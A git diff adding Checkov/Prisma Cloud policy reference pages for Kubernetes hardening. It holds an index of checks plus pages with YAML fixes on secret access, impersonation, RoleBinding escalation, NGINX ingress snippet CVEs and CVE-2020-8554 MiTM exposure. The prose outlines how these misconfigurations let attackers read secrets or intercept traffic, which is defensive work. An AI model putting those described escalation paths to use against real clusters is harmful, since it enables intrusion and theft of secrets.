https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py[CKV_K8S_102] +|HIGH + + +|xref:ensure-that-the-etcd-cafile-argument-is-set-as-appropriate.adoc[Encryption providers are not appropriately configured] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py[CKV_K8S_104] +|HIGH + + +|xref:ensure-that-the-etcd-certfile-and-etcd-keyfile-arguments-are-set-as-appropriate.adoc[The --etcd-certfile and --etcd-keyfile arguments are not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py[CKV_K8S_99] +|HIGH + + +|xref:ensure-that-the-event-qps-argument-is-set-to-0-or-a-level-which-ensures-appropriate-event-capture.adoc[The --event-qps argument is not set to a level that ensures appropriate event capture] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py[CKV_K8S_147] +|LOW + + +|xref:ensure-that-the-hostname-override-argument-is-not-set.adoc[The --hostname-override argument is set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py[CKV_K8S_146] +|LOW + + +|xref:ensure-that-the-insecure-bind-address-argument-is-not-set.adoc[The --insecure-bind-address argument is set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py[CKV_K8S_86] +|HIGH + + +|xref:ensure-that-the-insecure-port-argument-is-set-to-0.adoc[The --insecure-port argument is not set to 0] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py[CKV_K8S_88] +|HIGH + + +|xref:ensure-that-the-kubelet-certificate-authority-argument-is-set-as-appropriate.adoc[The --kubelet-certificate-authority argument is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py[CKV_K8S_73] +|HIGH + + +|xref:ensure-that-the-kubelet-client-certificate-and-kubelet-client-key-arguments-are-set-as-appropriate.adoc[The --kubelet-client-certificate and --kubelet-client-key arguments are not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py[CKV_K8S_72] +|HIGH + + +|xref:ensure-that-the-kubelet-https-argument-is-set-to-true.adoc[The --kubelet-https argument is not set to True] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py[CKV_K8S_71] +|HIGH + + +|xref:ensure-that-the-kubelet-only-makes-use-of-strong-cryptographic-ciphers.adoc[Kubelet does not use strong cryptographic ciphers] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py[CKV_K8S_151] +|LOW + + +|xref:ensure-that-the-make-iptables-util-chains-argument-is-set-to-true.adoc[The --make-iptables-util-chains argument is not set to True] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py[CKV_K8S_145] +|LOW + + +|xref:ensure-that-the-peer-cert-file-and-peer-key-file-arguments-are-set-as-appropriate.adoc[The --peer-cert-file and --peer-key-file arguments are not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py[CKV_K8S_119] +|HIGH + + +|xref:ensure-that-the-peer-client-cert-auth-argument-is-set-to-true.adoc[The --peer-client-cert-auth argument is not set to True] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/PeerClientCertAuthTrue.py[CKV_K8S_121] +|HIGH + + +|xref:ensure-that-the-profiling-argument-is-set-to-false-1.adoc[The --profiling argument is not set to False for scheduler] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py[CKV_K8S_114] +|LOW + + +|xref:ensure-that-the-profiling-argument-is-set-to-false-2.adoc[The --profiling argument is not set to false for API server] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py[CKV_K8S_90] +|LOW + + +|xref:ensure-that-the-profiling-argument-is-set-to-false.adoc[The --profiling argument for controller managers is not set to False] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py[CKV_K8S_107] +|MEDIUM + + +|xref:ensure-that-the-protect-kernel-defaults-argument-is-set-to-true.adoc[The --protect-kernel-defaults argument is not set to True] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py[CKV_K8S_144] +|LOW + + +|xref:ensure-that-the-read-only-port-argument-is-set-to-0.adoc[The --read-only-port argument is not set to 0] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py[CKV_K8S_141] +|LOW + + +|xref:ensure-that-the-request-timeout-argument-is-set-as-appropriate.adoc[The --request-timeout argument is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py[CKV_K8S_95] +|MEDIUM + + +|xref:ensure-that-the-root-ca-file-argument-is-set-as-appropriate.adoc[The --root-ca-file argument for controller managers is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py[CKV_K8S_111] +|HIGH + + +|xref:ensure-that-the-rotate-certificates-argument-is-not-set-to-false.adoc[The --rotate-certificates argument is set to false] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py[CKV_K8S_149] +|HIGH + + +|xref:ensure-that-the-rotatekubeletservercertificate-argument-is-set-to-true-for-controller-manager.adoc[The RotateKubeletServerCertificate argument for controller managers is not set to True] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py[CKV_K8S_112] +|MEDIUM + + +|xref:ensure-that-the-secure-port-argument-is-not-set-to-0.adoc[The --secure-port argument is set to 0] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py[CKV_K8S_89] +|LOW + + +|xref:ensure-that-the-service-account-key-file-argument-is-set-as-appropriate.adoc[The --service-account-key-file argument is not set appropriately] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py[CKV_K8S_97] +|MEDIUM + + +|xref:ensure-that-the-service-account-lookup-argument-is-set-to-true.adoc[The --service-account-lookup argument is not set to true] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py[CKV_K8S_96] +|HIGH + + +|xref:ensure-that-the-service-account-private-key-file-argument-is-set-as-appropriate.adoc[The --service-account-private-key-file argument for controller managers is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py[CKV_K8S_110] +|HIGH + + +|xref:ensure-that-the-streaming-connection-idle-timeout-argument-is-not-set-to-0.adoc[The --streaming-connection-idle-timeout argument is set to 0] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py[CKV_K8S_143] +|LOW + + +|xref:ensure-that-the-terminated-pod-gc-threshold-argument-is-set-as-appropriate.adoc[The --terminated-pod-gc-threshold argument for controller managers is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py[CKV_K8S_106] +|MEDIUM + + +|xref:ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate-for-kubelet.adoc[The --tls-cert-file and --tls-private-key-file arguments for Kubelet are not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py[CKV_K8S_148] +|HIGH + + +|xref:ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate.adoc[The --tls-cert-file and --tls-private-key-file arguments for API server are not set appropriately] 
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py[CKV_K8S_100] +|HIGH + + +|xref:ensure-that-the-token-auth-file-parameter-is-not-set.adoc[The --token-auth-file argument is set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py[CKV_K8S_70] +|LOW + + +|xref:ensure-that-the-use-service-account-credentials-argument-is-set-to-true.adoc[The --use-service-account-credentials argument for controller managers is not set to True] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py[CKV_K8S_108] +|HIGH + +|xref:granting-create-permissions-to-nodesproxy-or-podsexec-sub-resources-allows-potential-privilege-escalation.adoc[Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml[CKV2_K8S_2] +|HIGH + + +|xref:minimize-the-admission-of-containers-with-capabilities-assigned.adoc[Admission of containers with capabilities assigned is not minimised] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py[CKV_K8S_36] +|LOW + + +|xref:no-serviceaccountnode-should-be-able-to-read-all-secrets.adoc[No ServiceAccount/Node should be able to read all secrets] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml[CKV2_K8S_5] +|HIGH + + +|xref:no-serviceaccountnode-should-have-impersonate-permissions-for-groupsusersservice-accounts.adoc[No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml[CKV2_K8S_3] 
+|HIGH + + +|xref:prevent-all-nginx-ingress-annotation-snippets.adoc[NGINX Ingress has annotation snippets] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742AllSnippets.py[CKV_K8S_153] +|LOW + + +|xref:prevent-nginx-ingress-annotation-snippets-which-contain-alias-statements.adoc[NGINX Ingress has annotation snippets which contain alias statements] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Alias.py[CKV_K8S_154] +|LOW + + +|xref:prevent-nginx-ingress-annotation-snippets-which-contain-lua-code-execution.adoc[NGINX Ingress annotation snippets contain LUA code execution] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Lua.py[CKV_K8S_152] +|LOW + + +|xref:rolebinding-should-not-allow-privilege-escalation-to-a-serviceaccount-or-node-on-other-rolebinding.adoc[RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml[CKV2_K8S_1] +|HIGH + + +|xref:serviceaccounts-and-nodes-that-can-modify-servicesstatus-may-set-the-statusloadbalanceringressip-field-to-exploit-the-unfixed-cve-2020-8554-and-launch-mitm-attacks-against-the-cluster.adoc[ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml[CKV2_K8S_4] +|MEDIUM + + +|=== + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/minimize-the-admission-of-containers-with-capabilities-assigned.adoc 
b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/minimize-the-admission-of-containers-with-capabilities-assigned.adoc new file mode 100644 index 000000000..3ac1b61ea --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/minimize-the-admission-of-containers-with-capabilities-assigned.adoc @@ -0,0 +1,64 @@ +== Admission of containers with capabilities assigned is not minimised +// Admission of containers with capabilities assigned not minimized + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b1c9494c-3caa-497e-950f-4692e5d9fa79 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py[CKV_K8S_36] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Terraform,Helm,Kustomize + +|=== + + + +=== Description + + +Docker has a default list of capabilities that are allowed for each container of a pod. +The containers use the capabilities from this default list, but pod manifest authors can alter it by requesting additional capabilities, or dropping some of the default capabilities. +Limiting the admission of containers with capabilities ensures that only a small number of containers have extended capabilities outside the default range. +This helps ensure that if a container becomes compromised it is unable to provide a productive path for an attacker to move laterally to other containers in the pod. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* securityContext:capabilities:drop (Optional) + +The *capabilities* field allows granting certain privileges to a process without granting all the privileges of the root user. +When *drop* includes *ALL*, all default capabilities are dropped for that container. 
+ + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + securityContext: + capabilities: + drop: + - ALL +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/no-serviceaccountnode-should-be-able-to-read-all-secrets.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/no-serviceaccountnode-should-be-able-to-read-all-secrets.adoc new file mode 100644 index 000000000..c435a183e --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/no-serviceaccountnode-should-be-able-to-read-all-secrets.adoc @@ -0,0 +1,54 @@ +== No ServiceAccount/Node should be able to read all secrets +// ServiceAccounts and Nodes should not be able to read all secrets + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 68c3a96c-84d7-43c0-8a6a-7eacecac27d2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml[CKV2_K8S_5] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +In Kubernetes, a ServiceAccount is an account that is associated with a specific service. +A ServiceAccount can be granted specific permissions, known as "roles," that determine what actions it is allowed to perform within a Kubernetes cluster. +One potential issue with ServiceAccounts is that they could potentially be granted the ability to read all secrets in a Kubernetes cluster. +This would allow the ServiceAccount to access sensitive information such as passwords, API keys, and other sensitive data that is stored as secrets in the cluster. +Allowing a ServiceAccount to read all secrets could pose a security risk to the cluster, as it could potentially allow unauthorized access to sensitive information. 
+Therefore, it is generally best to avoid granting ServiceAccounts the ability to read all secrets in a cluster. +It is also important to note that nodes, which are the physical or virtual machines that run the Kubernetes cluster, can also potentially be granted the ability to read all secrets. +Therefore, it is also important to ensure that nodes do not have this ability to prevent potential unauthorized access to sensitive information. + +=== Fix - Buildtime + +Scope secret access to the specific secrets a workload needs instead of granting read access to all secrets. The role and secret names below are illustrative: + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: Role +metadata: + name: limited-secret-reader + namespace: default +rules: + - apiGroups: [""] + resources: ["secrets"] + resourceNames: ["my-app-secret"] + verbs: ["get"] +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/no-serviceaccountnode-should-have-impersonate-permissions-for-groupsusersservice-accounts.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/no-serviceaccountnode-should-have-impersonate-permissions-for-groupsusersservice-accounts.adoc new file mode 100644 index 000000000..6747ffb14 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/no-serviceaccountnode-should-have-impersonate-permissions-for-groupsusersservice-accounts.adoc @@ -0,0 +1,52 @@ +== No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts +// ServiceAccounts and Nodes should not have `impersonate` permissions for groups/users/service-accounts + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4a7f5715-3c2a-457c-a5f8-b905d78b2943 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml[CKV2_K8S_3] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +In Kubernetes, the impersonate permission allows a user or service account to perform actions as if they were another user or service account. 
+This can be useful in certain situations, such as when one service needs to access another service on behalf of a user. +However, allowing a ServiceAccount or Node to have impersonate permissions for other users or service accounts can potentially allow privilege escalation. +This is because ServiceAccounts and Nodes are not typically associated with individual users, so granting them the ability to impersonate other users could potentially allow any user who is able to access the ServiceAccount or Node to gain the privileges of the impersonated user. +For example, if a ServiceAccount has the impersonate permission for a user who has admin privileges, any user who is able to access the ServiceAccount would be able to perform actions as if they were an admin user. +This could lead to unauthorized access to sensitive information or the ability to perform unauthorized actions, so it is generally best to avoid granting impersonate permissions to ServiceAccounts and Nodes. + +=== Fix - Buildtime + +Remove the `impersonate` verb from any Role or ClusterRole bound to a ServiceAccount or Node, and grant only the verbs the workload actually needs. An illustrative ClusterRole with no impersonate permissions: + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: app-role +rules: + - apiGroups: [""] + resources: ["pods"] + verbs: ["get", "list", "watch"] +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-all-nginx-ingress-annotation-snippets.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-all-nginx-ingress-annotation-snippets.adoc new file mode 100644 index 000000000..cca31be77 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-all-nginx-ingress-annotation-snippets.adoc @@ -0,0 +1,69 @@ +== NGINX Ingress has annotation snippets +// NGINX Ingress includes annotation snippets + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5a7e7941-f1c4-4ddf-af78-155e0e0222d3 + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742AllSnippets.py[CKV_K8S_153] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Allowing custom snippet annotations in ingress-nginx enables a user who can create or update ingress objects to obtain all secrets in the cluster. +The safest option is to disallow any usage of annotation snippets. +Learn more about https://nvd.nist.gov/vuln/detail/CVE-2021-25742[CVE-2021-25742]. + +=== Fix - Buildtime + + +*Kubernetes* + + + + +[source,yaml] +---- +apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: app-ingress + annotations: + kubernetes.io/ingress.class: "nginx" + # do not add snippet annotations such as: + # nginx.ingress.kubernetes.io/server-snippet: | + #   location / { + #     return 200 'OK'; + #   } +spec: + rules: + - http: + paths: + - path: /exp + pathType: Prefix + backend: + service: + name: some-service + port: + number: 1234 +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-nginx-ingress-annotation-snippets-which-contain-alias-statements.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-nginx-ingress-annotation-snippets-which-contain-alias-statements.adoc new file mode 100644 index 000000000..92014e903 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-nginx-ingress-annotation-snippets-which-contain-alias-statements.adoc @@ -0,0 +1,73 @@ +== NGINX Ingress has annotation snippets which contain alias statements +// NGINX Ingress includes annotation snippets which contain alias state + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5ca59fca-d24c-4c9e-8abc-9cb8355653d9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Alias.py[CKV_K8S_154] + 
+|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Allowing custom snippet annotations in ingress-nginx enables a user who can create or update ingress objects to obtain all secrets in the cluster. +To still allow users to leverage the snippet feature, it is recommended to remove any usage of alias statements. +Learn more about https://nvd.nist.gov/vuln/detail/CVE-2021-25742[CVE-2021-25742]. + +=== Fix - Buildtime + + +*Kubernetes* + + + + +[source,yaml] +---- +apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: example-ingress + namespace: developer + annotations: + kubernetes.io/ingress.class: nginx + nginx.ingress.kubernetes.io/rewrite-target: /$2 + # the snippet below contains no alias statements + nginx.ingress.kubernetes.io/server-snippet: | + location ^~ "/test" { + default_type 'text/plain'; + } +spec: + rules: + - http: + paths: + - path: /test + pathType: Prefix + backend: + service: + name: web + port: + number: 8080 +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-nginx-ingress-annotation-snippets-which-contain-lua-code-execution.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-nginx-ingress-annotation-snippets-which-contain-lua-code-execution.adoc new file mode 100644 index 000000000..593b3b78d --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-nginx-ingress-annotation-snippets-which-contain-lua-code-execution.adoc @@ -0,0 +1,71 @@ +== NGINX Ingress annotation snippets contain LUA code execution +// NGINX Ingress annotation snippets contain LUA code execution + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 20885512-6025-4c23-a14d-b0ca7b63ed11 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Lua.py[CKV_K8S_152] + +|Severity +|LOW + 
+|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Allowing custom snippet annotations in ingress-nginx enables a user who can create or update ingress objects to obtain all secrets in the cluster. +To still allow users to leverage the snippet feature, it is recommended to remove any usage of LUA code. +Learn more about https://nvd.nist.gov/vuln/detail/CVE-2021-25742[CVE-2021-25742]. + +=== Fix - Buildtime + + +*Kubernetes* + + + + +[source,yaml] +---- +apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: app-ingress + annotations: + kubernetes.io/ingress.class: "nginx" + # the snippet below contains no LUA directives such as lua_package_path + nginx.ingress.kubernetes.io/server-snippet: | + location / { + return 200 'OK'; + } +spec: + rules: + - http: + paths: + - path: /exp + pathType: Prefix + backend: + service: + name: some-service + port: + number: 1234 +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/rolebinding-should-not-allow-privilege-escalation-to-a-serviceaccount-or-node-on-other-rolebinding.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/rolebinding-should-not-allow-privilege-escalation-to-a-serviceaccount-or-node-on-other-rolebinding.adoc new file mode 100644 index 000000000..c1709b8cc --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/rolebinding-should-not-allow-privilege-escalation-to-a-serviceaccount-or-node-on-other-rolebinding.adoc @@ -0,0 +1,62 @@ +== RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding +// RoleBinding should not allow privilege escalation to a ServiceAccount or Node on another RoleBinding + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 95361a8b-7942-416d-bd19-87b2c8f57d41 + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml[CKV2_K8S_1] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +In Kubernetes, a RoleBinding is used to grant specific permissions to a user or group of users. +These permissions, also known as "roles," determine what actions a user is allowed to perform within a Kubernetes cluster. +It is important to ensure that RoleBindings are configured in a way that does not allow privilege escalation. +This means that a user with a RoleBinding should not be able to gain access to privileges that they are not explicitly granted through their RoleBinding. +Allowing privilege escalation would mean that a user could potentially gain unauthorized access to sensitive information or perform actions that they are not supposed to be able to perform. +This could pose a security risk to the cluster, so it is important to prevent privilege escalation in RoleBindings. +One way to prevent privilege escalation in RoleBindings is to make sure that they are not granted to ServiceAccounts or Nodes. +This is because ServiceAccounts and Nodes are not typically associated with individual users, so granting a RoleBinding to them could potentially allow any user who is able to access the ServiceAccount or Node to gain the privileges granted by the RoleBinding. +This could lead to privilege escalation, so it is generally best to avoid granting RoleBindings to ServiceAccounts and Nodes. 
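+
+For illustration, a minimal sketch (all names hypothetical) of a binding that this policy would flag, granting a ClusterRole directly to a ServiceAccount:
+
+[source,yaml]
+----
+apiVersion: rbac.authorization.k8s.io/v1
+kind: RoleBinding
+metadata:
+  name: example-binding
+  namespace: default
+subjects:
+# binding to a ServiceAccount (or a Node identity) is what this policy flags
+- kind: ServiceAccount
+  name: default
+  namespace: default
+roleRef:
+  kind: ClusterRole
+  name: edit
+  apiGroup: rbac.authorization.k8s.io
+----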
+
+=== Fix - Buildtime
+
+
+[source,yaml]
+----
+apiVersion: rbac.authorization.k8s.io/v1
+kind: RoleBinding
+metadata:
+  name: restricted-access
+subjects:
+# bind to users or groups rather than to ServiceAccounts or Nodes
+- kind: User
+  name: example-user # hypothetical subject name
+  apiGroup: rbac.authorization.k8s.io
+roleRef:
+  kind: ClusterRole
+  name: restricted-access
+  apiGroup: rbac.authorization.k8s.io
+----
+
diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/serviceaccounts-and-nodes-potentially-exposed-to-cve-2020-8554.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/serviceaccounts-and-nodes-potentially-exposed-to-cve-2020-8554.adoc
new file mode 100644
index 000000000..11f8fce5d
--- /dev/null
+++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/serviceaccounts-and-nodes-potentially-exposed-to-cve-2020-8554.adoc
@@ -0,0 +1,56 @@
+== ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 28c7c577-3842-43dd-b0d2-c0bbcc9cb7c8
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml[CKV2_K8S_4]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|Kubernetes, Helm, Kustomize
+
+|===
+
+
+
+=== Description
+
+
+In Kubernetes, a ServiceAccount provides an identity for processes that run inside a Pod.
+A ServiceAccount can be granted specific permissions, known as "roles," that determine what actions it is allowed to perform within a Kubernetes cluster.
+One potential issue with ServiceAccounts is that they can be used to exploit a vulnerability known as CVE-2020-8554.
+This vulnerability allows a ServiceAccount that has the ability to modify services and their status to set the `status.loadBalancer.ingress.ip` field to an arbitrary IP address.
+If a ServiceAccount with these permissions sets the status.loadBalancer.ingress.ip field to an IP address that they control, they would be able to launch a man-in-the-middle (MiTM) attack against the cluster. +This would allow them to intercept and modify traffic between the cluster and the specified IP address, potentially allowing them to gain access to sensitive information or perform unauthorized actions. +To prevent this type of attack, it is important to ensure that ServiceAccounts with the ability to modify services and their status do not have the ability to set the status.loadBalancer.ingress.ip field. +This can be done by carefully configuring the roles and permissions associated with the ServiceAccounts in the cluster. +It is also important to note that nodes, which are the physical or virtual machines that run the Kubernetes cluster, can also potentially exploit the CVE-2020-8554 vulnerability if they have the ability to modify services and their status. +Therefore, it is also important to ensure that nodes do not have these permissions to prevent potential MiTM attacks against the cluster. 
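+
+As an illustration (all names hypothetical), the risky grant this policy looks for is RBAC that allows modifying `services/status`:
+
+[source,yaml]
+----
+apiVersion: rbac.authorization.k8s.io/v1
+kind: Role
+metadata:
+  name: risky-role
+  namespace: default
+rules:
+# patch/update on services/status allows setting
+# status.loadBalancer.ingress.ip (CVE-2020-8554)
+- apiGroups: [""]
+  resources: ["services/status"]
+  verbs: ["patch", "update"]
+----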
+
+=== Fix - Buildtime
+
+
+[source,yaml]
+----
+# Illustrative sketch (hypothetical names): grant only the verbs that are
+# needed, and do not grant update/patch on services/status
+apiVersion: rbac.authorization.k8s.io/v1
+kind: Role
+metadata:
+  name: my-service-role
+  namespace: default
+rules:
+- apiGroups: [""]
+  resources: ["services"]
+  verbs: ["get", "list", "watch"]
+----
+
diff --git a/code-security/policy-reference/oci-policies/compute/compute.adoc b/code-security/policy-reference/oci-policies/compute/compute.adoc
new file mode 100644
index 000000000..78f21157c
--- /dev/null
+++ b/code-security/policy-reference/oci-policies/compute/compute.adoc
@@ -0,0 +1,19 @@
+== Compute
+
+[width=85%]
+[cols="1,1,1"]
+|===
+|Policy|Checkov Check ID| Severity
+
+|xref:ensure-oci-compute-instance-boot-volume-has-in-transit-data-encryption-enabled.adoc[OCI Compute Instance boot volume has in-transit data encryption disabled]
